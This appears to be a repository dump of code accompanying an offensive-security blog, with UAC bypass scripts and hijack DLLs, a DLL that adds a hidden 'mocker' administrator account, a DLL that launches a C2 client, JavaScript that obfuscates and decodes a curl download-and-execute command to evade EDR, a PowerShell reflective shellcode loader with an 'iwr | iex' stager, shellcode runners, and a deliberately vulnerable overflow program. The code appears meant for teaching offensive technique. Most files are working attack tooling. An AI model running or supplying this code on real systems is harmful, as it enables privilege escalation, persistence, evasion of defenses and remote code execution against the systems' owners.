├── 2025 - Buffer Overflow Series
├── overflow3.exe
├── encoder_stub.py
├── overflow3.cpp
├── stub.asm
├── buff_for_post.py
└── buff_for_post_2.py
├── 2024-12-20-Create your own C2 using Python - Part 3
├── elevationstation
│ ├── def.h
│ ├── elevationstation.vcxproj.user
│ ├── elevationstation.vcxproj.filters
│ ├── tokenprivs.cpp
│ └── elevationstation.vcxproj
├── migrator
│ ├── def.h
│ ├── migrator.vcxproj.user
│ ├── migrator.vcxproj.filters
│ ├── tokenprivs.cpp
│ └── migrator.vcxproj
├── migrator2
│ ├── migrator2.vcxproj.user
│ ├── migrator2.vcxproj.filters
│ ├── migrator2.vcxproj
│ └── migrator2.cpp
├── UIAccess_bypassUAC
│ ├── UIAccess_bypassUAC.vcxproj.user
│ ├── UIAccess_bypassUAC.vcxproj.filters
│ ├── UIAccess_bypassUAC.cpp
│ └── UIAccess_bypassUAC.vcxproj
├── migrator2.sln
├── migrator.sln
├── betterdll2.c
├── elevationstation.sln
├── UIAccess_bypassUAC.sln
└── getitdone.ps1
├── README.md
├── 2025-8-23-Using Direct Syscalls with an In-Memory PIC Shellcode Loader
├── syscall_mayhem_6
│ ├── syscall_mayhem_6.vcxproj.user
│ ├── ManualNtdll.h
│ ├── syscall_mayhem_6.vcxproj.filters
│ ├── ManualNtdll.cpp
│ ├── syscall_mayhem_6.cpp
│ └── syscall_mayhem_6.vcxproj
├── syscall_mayhem_6.sln
├── apiencoder.asm
└── codeforblog_apihashing.asm
├── 2024-10-16-Creative UAC Bypass Methods for the Modern Era
├── elevator.bat
├── netutils.c
├── api-ms-win-core-kernel32-legacy-l1.dll.c
├── CSMTP COM interface UAC Bypass
│ ├── dll.cpp
│ └── injector.cpp
├── UACBypass2.ps1
└── UIAccess_bypassUAC.cpp
├── 4-22-2025-Intel Shader Cache UAC Bypass
└── permissions.ps1
├── 2023-09-27-Malware EDR Evasion Techniques
├── encoder.js
├── decoder.js
└── obfuscated.js
├── 2024-11-6-x64 Assembly & Shellcoding 101 - Part 4
├── shellcode.cpp
└── calc_encoded.asm
├── 2025-8-12-How to Create a Staged In-Memory .NET Reflective Shellcode Loader
├── loadsc_dynamic2.ps1
└── Class1.cs
├── 2024-11-1-x64 Assembly & Shellcoding 101
├── shellcode.cpp
└── winexec.asm
├── 2024-11-4-x64 Assembly & Shellcoding 101 - Part 3
├── shellcode.cpp
└── calc_nonullz.asm
├── 2024-11-22-Create your own C2 using Python- Part 1.md
├── pyrevshell_server.py
├── pyrevshell_client.py
├── c2client_part1.py
└── c2server_part1.py
├── 2023-08-19-Create your own Netcat using Python
├── custom_netcat_svr.py
└── custom_netcat_cli.py
├── 2024-11-10-x64 Assembly & Shellcoding 101 - Part 5
├── msgbox_shellcode.cpp
└── msgbox.asm
├── 2025-5-16-Steganography is still relevant!
├── hide_in_jpeg.cpp
└── exec_jpeg.cpp
├── 2024-11-17-x64 Assembly & Shellcoding 101 - Conclusion
└── shellcode.cpp
├── 2025-10-3-Module Stomping 101 - My Favorite Stomping Grounds
└── mstmp2.cpp
├── 2024-11-15-x64 Assembly & Shellcoding 101 - Part 6.md
└── asmsock.asm
└── 2024-11-27-Create your own C2 using Python- Part 2
└── c2client_part2.py
/2025 - Buffer Overflow Series/overflow3.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/g3tsyst3m/CodefromBlog/HEAD/2025 - Buffer Overflow Series/overflow3.exe
--------------------------------------------------------------------------------
/2024-12-20-Create your own C2 using Python - Part 3/elevationstation/def.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | void Color(int color);
3 | void setThreadPrivs(LPCWSTR privname);
4 | void setProcessPrivs(LPCWSTR privname);
--------------------------------------------------------------------------------
/2024-12-20-Create your own C2 using Python - Part 3/migrator/def.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | //void setThreadPrivs(LPCWSTR privname);
3 | //void setProcessPrivs(LPCWSTR privname);
4 | //bool IsProcessElevated();
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # CodefromBlog
2 | The code I write in my blog
3 |
4 | > **Update 11/23/2024**: I promise to begin retroactively updating this repo to reflect all the code in the blog starting today! You should start to see more folders show up soon 😸
5 |
--------------------------------------------------------------------------------
/2024-12-20-Create your own C2 using Python - Part 3/migrator/migrator.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/2024-12-20-Create your own C2 using Python - Part 3/migrator2/migrator2.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/2024-12-20-Create your own C2 using Python - Part 3/elevationstation/elevationstation.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/2024-12-20-Create your own C2 using Python - Part 3/UIAccess_bypassUAC/UIAccess_bypassUAC.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/2025-8-23-Using Direct Syscalls with an In-Memory PIC Shellcode Loader/syscall_mayhem_6/syscall_mayhem_6.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/2024-10-16-Creative UAC Bypass Methods for the Modern Era/elevator.bat:
--------------------------------------------------------------------------------
1 | @echo off
2 | cd %USERPROFILE%\Desktop
3 | mkdir "\\?\C:\Windows "
4 | mkdir "\\?\C:\Windows \System32"
5 | copy "c:\windows\system32\easinvoker.exe" "C:\Windows \System32\"
6 | cd c:\temp
7 | copy "netutils.dll" "C:\Windows \System32\"
8 | "C:\Windows \System32\easinvoker.exe"
9 | del /q "C:\Windows \System32\*"
10 | rmdir "C:\Windows \System32\"
11 | rmdir "C:\Windows \"
12 | cd %USERPROFILE%\Desktop
--------------------------------------------------------------------------------
/2025-8-23-Using Direct Syscalls with an In-Memory PIC Shellcode Loader/syscall_mayhem_6/ManualNtdll.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 | #include
4 |
5 | class ManualNtdll {
6 | public:
7 | ManualNtdll();
8 | ~ManualNtdll();
9 | bool LoadFromDisk(const std::wstring& path);
10 | void* GetProcAddress(const std::string& name);
11 | void* ResolveSyscallStub(void* funcAddr);
12 | void* GetMappedBase() const;
13 |
14 | private:
15 | HANDLE hFile = nullptr;
16 | HANDLE hMapping = nullptr;
17 | void* mappedBase = nullptr;
18 | };
19 |
--------------------------------------------------------------------------------
/2024-10-16-Creative UAC Bypass Methods for the Modern Era/netutils.c:
--------------------------------------------------------------------------------
1 | //x86_64-w64-mingw32-gcc netutils.c -shared -o netutils.dll
2 | #include
3 | #include
4 | #include
5 |
6 | BOOL APIENTRY DllMain (HMODULE hModule, DWORD dwReason, LPVOID lpReserved){
7 | switch(dwReason){
8 | case DLL_PROCESS_ATTACH:
9 | WinExec("cmd.exe", 1);
10 | break;
11 | case DLL_PROCESS_DETACH:
12 | break;
13 | case DLL_THREAD_ATTACH:
14 | break;
15 | case DLL_THREAD_DETACH:
16 | break;
17 | }
18 | return TRUE;
19 | }
20 | NET_API_STATUS WINAPI NetApiBufferFree(LPVOID Buffer)
21 | {
22 | Sleep(INFINITE);
23 | return 1;
24 | }
--------------------------------------------------------------------------------
/4-22-2025-Intel Shader Cache UAC Bypass/permissions.ps1:
--------------------------------------------------------------------------------
1 | $target = "C:\Users\robbi\AppData\LocalLow\Intel\ShaderCache"
2 |
3 | # 2. Remove inheritance and wipe existing permissions
4 | icacls $target /inheritance:r /T
5 | icacls $target /remove:g "ANONYMOUS LOGON" "Guests" "Administrators" /T
6 |
7 | # 3. Grant minimal permissions to the folder and subfolders
8 | # (CI) - Container Inherit (subfolders)
9 | # (OI) - Object Inherit (files)
10 | # This only affects ACL propagation
11 | icacls $target /grant:r "Authenticated Users:(OI)(CI)(RX,D)" /T
12 |
13 | # 4. Explicitly overwrite ACLs on existing files with only (RX,D)
14 | Get-ChildItem $target -Recurse -File | ForEach-Object {
15 | icacls $_.FullName /inheritance:r
16 | icacls $_.FullName /grant:r "Authenticated Users:(RX,D)"
17 | }
--------------------------------------------------------------------------------
/2023-09-27-Malware EDR Evasion Techniques/encoder.js:
--------------------------------------------------------------------------------
1 |
2 | var encodedURI = [];
3 | var encoded = [];
4 | var ccc = "curl -k -f -s -L ";
5 | var lastccc=" -o c:/users/public/thedroppedfile";
6 | var thelink="https://raw.githubusercontent.com/g3tsyst3m/elevationstation/main/elevationstation/elevationstation.cpp";
7 | var sizeof1=ccc.length;
8 | var sizeof2=lastccc.length;
9 | var sizeof3=thelink.length;
10 | for (a=0;a
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/2024-12-20-Create your own C2 using Python - Part 3/UIAccess_bypassUAC/UIAccess_bypassUAC.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/2024-10-16-Creative UAC Bypass Methods for the Modern Era/api-ms-win-core-kernel32-legacy-l1.dll.c:
--------------------------------------------------------------------------------
1 | #include "pch.h"
2 | #include
3 |
4 | #pragma comment (lib, "user32.lib")
5 |
6 | DWORD WINAPI MyThread(LPVOID lpParam)
7 | {
8 | WinExec("cmd.exe /c net user mocker M0ck3d2024 /add && net localgroup administrators mocker /add", 0);
9 | WinExec("cmd.exe /c echo hey > c:\\heythere.txt", 0);
10 | return 0;
11 | }
12 |
13 |
14 | DWORD WINAPI WorkItem(LPVOID lpParam)
15 | {
16 | MyThread(NULL);
17 | return 0;
18 | }
19 |
20 | BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
21 | {
22 | switch (fdwReason)
23 | {
24 | case DLL_PROCESS_ATTACH:
25 | DisableThreadLibraryCalls(hinstDLL); // Avoid unnecessary notifications
26 |
27 | // Use QueueUserWorkItem to safely execute code after the DLL has been loaded
28 | QueueUserWorkItem(WorkItem, NULL, WT_EXECUTEDEFAULT);
29 |
30 | // Optionally execute additional code here, e.g., WinExec command
31 | // WinExec("cmd.exe /c net user mocker M0ck3d2024 /add && net localgroup administrators mocker /add", 0);
32 |
33 | break;
34 | case DLL_THREAD_ATTACH:
35 | case DLL_THREAD_DETACH:
36 | case DLL_PROCESS_DETACH:
37 | break;
38 | }
39 | return TRUE;
40 | }
--------------------------------------------------------------------------------
/2024-12-20-Create your own C2 using Python - Part 3/migrator/migrator.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 | Source Files
23 |
24 |
25 |
26 |
27 | Header Files
28 |
29 |
30 |
--------------------------------------------------------------------------------
/2024-12-20-Create your own C2 using Python - Part 3/elevationstation/elevationstation.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 | Source Files
23 |
24 |
25 |
26 |
27 | Header Files
28 |
29 |
30 |
--------------------------------------------------------------------------------
/2025-8-23-Using Direct Syscalls with an In-Memory PIC Shellcode Loader/syscall_mayhem_6/syscall_mayhem_6.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 | Source Files
23 |
24 |
25 |
26 |
27 | Header Files
28 |
29 |
30 |
--------------------------------------------------------------------------------
/2023-09-27-Malware EDR Evasion Techniques/decoder.js:
--------------------------------------------------------------------------------
1 |
2 | var decoded1 = [];
3 | var linkURI = [];
4 | var decoded2 = [];
5 | var decodedURI = [];
6 | var encoded1 = [43,61,58,36,104,101,35,104,101,46,104,101,59,104,101,4,104];
7 | var encoded2 = [104,101,39,104,43,114,103,61,59,45,58,59,103,56,61,42,36,33,43,103,60,32,45,44,58,39,56,56,45,44,46,33,36,45];
8 | var thelink = [32,60,60,56,59,114,103,103,58,41,63,102,47,33,60,32,61,42,61,59,45,58,43,39,38,60,45,38,60,102,43,39,37,103,47,123,60,59,49,59,60,123,37,103,45,36,45,62,41,60,33,39,38,59,60,41,60,33,39,38,103,37,41,33,38,103,45,36,45,62,41,60,33,39,38,59,60,41,60,33,39,38,103,45,36,45,62,41,60,33,39,38,59,60,41,60,33,39,38,102,43,56,56];
9 | var sizeof1=encoded1.length;
10 | var sizeof2=encoded2.length;
11 | var sizeof3=thelink.length;
12 |
13 | var obj = new ActiveXObject('WScript.Shell');
14 | for (a=0;a
2 | #include
3 |
4 | unsigned char shellcode[] =
5 | "\x48\x83\xec\x28\x48\x83\xe4\xf0\x48\x31\xc9\x65\x48\x8b\x41"
6 | "\x60\x48\x8b\x40\x18\x48\x8b\x70\x10\x48\x8b\x36\x48\x8b\x36"
7 | "\x48\x8b\x5e\x30\x49\x89\xd8\x8b\x5b\x3c\x4c\x01\xc3\x48\x31"
8 | "\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01"
9 | "\xc2\x44\x8b\x52\x14\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3"
10 | "\x4c\x89\xd1\x48\xb8\xa8\x96\x91\xba\x87\x9a\x9c\x6f\x48\xf7"
11 | "\xd0\x48\xc1\xe0\x08\x48\xc1\xe8\x08\x50\x48\x89\xe0\x48\x83"
12 | "\xc4\x08\x67\xe3\x16\x31\xdb\x41\x8b\x1c\x8b\x4c\x01\xc3\x48"
13 | "\xff\xc9\x4c\x8b\x08\x4c\x39\x0b\x74\x03\x75\xe7\xcc\xff\xc1"
14 | "\x4d\x31\xdb\x44\x8b\x5a\x1c\x4d\x01\xc3\x45\x8b\x3c\x8b\x4d"
15 | "\x01\xc7\x48\x31\xc0\x50\x48\xb8\x9c\x9e\x93\x9c\xd1\x9a\x87"
16 | "\x9a\x48\xf7\xd0\x50\x48\x89\xe1\x48\x31\xd2\x48\xff\xc2\x48"
17 | "\x83\xec\x30\x41\xff\xd7";
18 |
19 |
20 | int main() {
21 |
22 | void* exec_mem = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
23 |
24 | if (exec_mem == nullptr) {
25 | std::cerr << "Memory allocation failed\n";
26 | return -1;
27 | }
28 | memcpy(exec_mem, shellcode, sizeof(shellcode));
29 | auto shellcode_func = reinterpret_cast(exec_mem);
30 | shellcode_func();
31 | VirtualFree(exec_mem, 0, MEM_RELEASE);
32 | return 0;
33 | }
--------------------------------------------------------------------------------
/2025-8-12-How to Create a Staged In-Memory .NET Reflective Shellcode Loader/loadsc_dynamic2.ps1:
--------------------------------------------------------------------------------
1 | $code = @'
2 | # Download the DLL as a byte array
3 | #$url = 'http://localhost:8080/ClassLibrary3.dll'
4 | $url = 'https://github.com/g3tsyst3m/undertheradar/raw/refs/heads/main/ClassLibrary3.dll'
5 | $webClient = New-Object System.Net.WebClient
6 | $assemblyBytes = $webClient.DownloadData($url)
7 |
8 | # Load the assembly from the byte array
9 | $assembly = [System.Reflection.Assembly]::Load($assemblyBytes)
10 |
11 | # Define the type and method to invoke
12 | $typeName = 'ShellcodeRunner' # Replace with actual namespace and class name if needed
13 | $methodName = 'ExecuteShellcode' # Replace with actual method name
14 |
15 | # Get the type from the assembly
16 | $type = $assembly.GetType($typeName)
17 |
18 | if ($type -eq $null) {
19 | Write-Host "Error: Type '$typeName' not found in the assembly."
20 | exit
21 | }
22 |
23 | # Get the method to invoke
24 | $methodInfo = $type.GetMethod($methodName, [System.Reflection.BindingFlags]::Public -bor [System.Reflection.BindingFlags]::Static)
25 |
26 | if ($methodInfo -eq $null) {
27 | Write-Host "Error: Method '$methodName' not found in type '$typeName'."
28 | exit
29 | }
30 |
31 | # Invoke the method
32 | $methodInfo.Invoke($null, @())
33 | '@
34 |
35 | # Execute the dynamically generated code
36 | iex $code
37 |
38 | #stager
39 | #powershell -w h -c "iwr 'http://localhost:8080/loadsc_dynamic2.ps1' | iex"
--------------------------------------------------------------------------------
/2024-11-1-x64 Assembly & Shellcoding 101/shellcode.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | unsigned char shellcode[] =
5 | "\x48\x83\xec\x28\x48\x83\xe4\xf0\x48\x31\xc9\x65\x48\x8b\x41\x60"
6 | "\x48\x8b\x40\x18\x48\x8b\x70\x10\x48\x8b\x36\x48\x8b\x36\x48\x8b"
7 | "\x5e\x30\x49\x89\xd8\x8b\x5b\x3c\x4c\x01\xc3\x8b\x93\x88\x00\x00"
8 | "\x00\x4c\x01\xc2\x44\x8b\x52\x14\x4d\x31\xdb\x44\x8b\x5a\x20\x4d"
9 | "\x01\xc3\x4c\x89\xd1\x48\xb8\x57\x69\x6e\x45\x78\x65\x63\x00\x50"
10 | "\x48\x89\xe0\x48\x83\xc4\x08\xeb\x00\x67\xe3\x19\x31\xdb\x41\x8b"
11 | "\x1c\x8b\x4c\x01\xc3\x48\xff\xc9\x4c\x8b\x08\x4c\x39\x0b\x74\x02"
12 | "\x75\xe7\x51\xeb\x01\xcc\x41\x5f\x78\x00\x4c\x89\xf9\x4d\x31\xdb"
13 | "\x44\x8b\x5a\x24\x4d\x01\xc3\x48\xff\xc1\x66\x45\x8b\x2c\x4b\x4d"
14 | "\x31\xdb\x44\x8b\x5a\x1c\x4d\x01\xc3\x43\x8b\x04\xab\x4c\x01\xc0"
15 | "\x50\x78\x00\x41\x5f\xb8\x00\x00\x00\x00\x50\x48\xb8\x63\x61\x6c"
16 | "\x63\x2e\x65\x78\x65\x50\x48\x89\xe1\xba\x01\x00\x00\x00\x48\x83"
17 | "\xec\x30\x41\xff\xd7";
18 |
19 | int main() {
20 |
21 | void* exec_mem = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
22 |
23 | if (exec_mem == nullptr) {
24 | std::cerr << "Memory allocation failed\n";
25 | return -1;
26 | }
27 | memcpy(exec_mem, shellcode, sizeof(shellcode));
28 | auto shellcode_func = reinterpret_cast(exec_mem);
29 | shellcode_func();
30 | VirtualFree(exec_mem, 0, MEM_RELEASE);
31 | return 0;
32 | }
--------------------------------------------------------------------------------
/2025 - Buffer Overflow Series/overflow3.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 | //compilation instructions on mingw32
6 | //x86_64-w64-mingw32-g++ -o overflow.exe overflow.cpp -fno-stack-protector -no-pie
7 |
8 | // Disable security features to make the program vulnerable
9 | #pragma comment(linker, "/SAFESEH:NO") // Disable SafeSEH
10 | #pragma comment(linker, "/DYNAMICBASE:NO") // Disable ASLR
11 | #pragma comment(linker, "/NXCOMPAT:NO") // Disable DEP
12 |
13 |
14 | void win_function() {
15 | std::cout << "You have successfully exploited the program!\n";
16 | system("calc.exe"); // Launch calculator as a demonstration
17 | }
18 |
19 |
20 | void vulnerable_function() {
21 | char buffer[275]; // medium-size buffer for the overflow
22 | std::cout << "Enter some input: ";
23 | std::cin >> buffer; // Unsafe function vulnerable to overflow
24 | }
25 |
26 | int main() {
27 | LPVOID allocatedMemory = VirtualAlloc(
28 | NULL, // Address, NULL means it is chosen by the system
29 | 1024, // Size in bytes
30 | MEM_COMMIT | MEM_RESERVE, // Allocation type
31 | PAGE_READWRITE // Memory protection
32 | );
33 |
34 | if (allocatedMemory != NULL) {
35 | printf("Memory allocated at %p\n", allocatedMemory);
36 | } else {
37 | printf("VirtualAlloc failed with error code %lu\n", GetLastError());
38 | }
39 | std::cout << "Welcome to the vulnerable program!\n";
40 | vulnerable_function();
41 | std::cout << "Goodbye!\n";
42 | return 0;
43 | }
44 |
--------------------------------------------------------------------------------
/2024-12-20-Create your own C2 using Python - Part 3/migrator.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.6.33815.320
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "migrator", "migrator\migrator.vcxproj", "{91B67BC2-78B4-4B06-AEC8-BCB6C1A9454F}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {91B67BC2-78B4-4B06-AEC8-BCB6C1A9454F}.Debug|x64.ActiveCfg = Debug|x64
17 | {91B67BC2-78B4-4B06-AEC8-BCB6C1A9454F}.Debug|x64.Build.0 = Debug|x64
18 | {91B67BC2-78B4-4B06-AEC8-BCB6C1A9454F}.Debug|x86.ActiveCfg = Debug|Win32
19 | {91B67BC2-78B4-4B06-AEC8-BCB6C1A9454F}.Debug|x86.Build.0 = Debug|Win32
20 | {91B67BC2-78B4-4B06-AEC8-BCB6C1A9454F}.Release|x64.ActiveCfg = Release|x64
21 | {91B67BC2-78B4-4B06-AEC8-BCB6C1A9454F}.Release|x64.Build.0 = Release|x64
22 | {91B67BC2-78B4-4B06-AEC8-BCB6C1A9454F}.Release|x86.ActiveCfg = Release|Win32
23 | {91B67BC2-78B4-4B06-AEC8-BCB6C1A9454F}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {0DBA8945-1B89-4444-B2D7-B2C2B6970D09}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/2024-11-4-x64 Assembly & Shellcoding 101 - Part 3/shellcode.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | // Shellcode (as given, formatted for clarity)
5 | unsigned char shellcode[] =
6 | "\x48\x83\xec\x28\x48\x83\xe4\xf0\x48\x31\xc9\x65\x48\x8b\x41\x60\x48\x8b"
7 | "\x40\x18\x48\x8b\x70\x10\x48\x8b\x36\x48\x8b\x36\x48\x8b\x5e\x30\x49\x89"
8 | "\xd8\x8b\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9"
9 | "\x08\x8b\x14\x0b\x4c\x01\xc2\x44\x8b\x52\x14\x4d\x31\xdb\x44\x8b\x5a\x20"
10 | "\x4d\x01\xc3\x4c\x89\xd1\x48\xb8\x57\x69\x6e\x45\x78\x65\x63\x90\x48\xc1"
11 | "\xe0\x08\x48\xc1\xe8\x08\x50\x48\x89\xe0\x48\x83\xc4\x08\x67\xe3\x17\x31"
12 | "\xdb\x41\x8b\x5c\x8b\x04\x4c\x01\xc3\x48\xff\xc9\x4c\x8b\x08\x4c\x39\x0b"
13 | "\x74\x03\x75\xe6\xcc\x51\x41\x5f\x4c\x89\xf9\x4d\x31\xdb\x44\x8b\x5a\x24"
14 | "\x4d\x01\xc3\x48\xff\xc1\x66\x45\x8b\x2c\x4b\x4d\x31\xdb\x44\x8b\x5a\x1c"
15 | "\x4d\x01\xc3\x43\x8b\x44\xab\x04\x4c\x01\xc0\x50\x41\x5f\x48\x31\xc0\x50"
16 | "\x48\xb8\x63\x61\x6c\x63\x2e\x65\x78\x65\x50\x48\x89\xe1\x48\x31\xd2\x48"
17 | "\xff\xc2\x48\x83\xec\x30\x41\xff\xd7";
18 |
19 | int main() {
20 | void* exec_mem = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
21 |
22 | if (exec_mem == nullptr) {
23 | std::cerr << "Memory allocation failed\n";
24 | return -1;
25 | }
26 |
27 | memcpy(exec_mem, shellcode, sizeof(shellcode));
28 | auto shellcode_func = reinterpret_cast(exec_mem);
29 | shellcode_func();
30 | VirtualFree(exec_mem, 0, MEM_RELEASE);
31 |
32 | return 0;
33 | }
--------------------------------------------------------------------------------
/2024-12-20-Create your own C2 using Python - Part 3/betterdll2.c:
--------------------------------------------------------------------------------
1 | #include
2 |
3 | DWORD WINAPI ThreadProc(LPVOID lpParam) {
4 | // Command to be executed by WinExec
5 | //You'll want to edit this to make sure the path lines up with your installation of python on the victim machine
6 | //or better yet, compile this to an exe so you don't have to reference the python path :)
7 | WinExec("c:\\users\\robbi\\AppData\\Local\\Programs\\Python\\Python313\\python.exe c:\\users\\public\\c2client_part3.py", 0);
8 | return 0;
9 | }
10 |
11 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
12 | switch (ul_reason_for_call) {
13 | case DLL_PROCESS_ATTACH: {
14 | // Disable thread library calls to optimize performance
15 | DisableThreadLibraryCalls(hModule);
16 |
17 | // Create a new thread to run the command
18 | HANDLE hThread = CreateThread(
19 | NULL, // default security attributes
20 | 0, // use default stack size
21 | ThreadProc, // thread function
22 | NULL, // argument to thread function
23 | 0, // use default creation flags
24 | NULL); // returns the thread identifier
25 |
26 | if (hThread) {
27 | // Close the thread handle as we don't need it anymore
28 | CloseHandle(hThread);
29 | }
30 | break;
31 | }
32 | case DLL_THREAD_ATTACH:
33 | case DLL_THREAD_DETACH:
34 | case DLL_PROCESS_DETACH:
35 | break;
36 | }
37 | return TRUE;
38 | }
39 |
--------------------------------------------------------------------------------
/2024-12-20-Create your own C2 using Python - Part 3/elevationstation.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.6.33723.286
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "elevationstation", "elevationstation\elevationstation.vcxproj", "{C5F1C8EE-8D2B-4DCA-B057-D4191BF9E36B}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {C5F1C8EE-8D2B-4DCA-B057-D4191BF9E36B}.Debug|x64.ActiveCfg = Debug|x64
17 | {C5F1C8EE-8D2B-4DCA-B057-D4191BF9E36B}.Debug|x64.Build.0 = Debug|x64
18 | {C5F1C8EE-8D2B-4DCA-B057-D4191BF9E36B}.Debug|x86.ActiveCfg = Debug|Win32
19 | {C5F1C8EE-8D2B-4DCA-B057-D4191BF9E36B}.Debug|x86.Build.0 = Debug|Win32
20 | {C5F1C8EE-8D2B-4DCA-B057-D4191BF9E36B}.Release|x64.ActiveCfg = Release|x64
21 | {C5F1C8EE-8D2B-4DCA-B057-D4191BF9E36B}.Release|x64.Build.0 = Release|x64
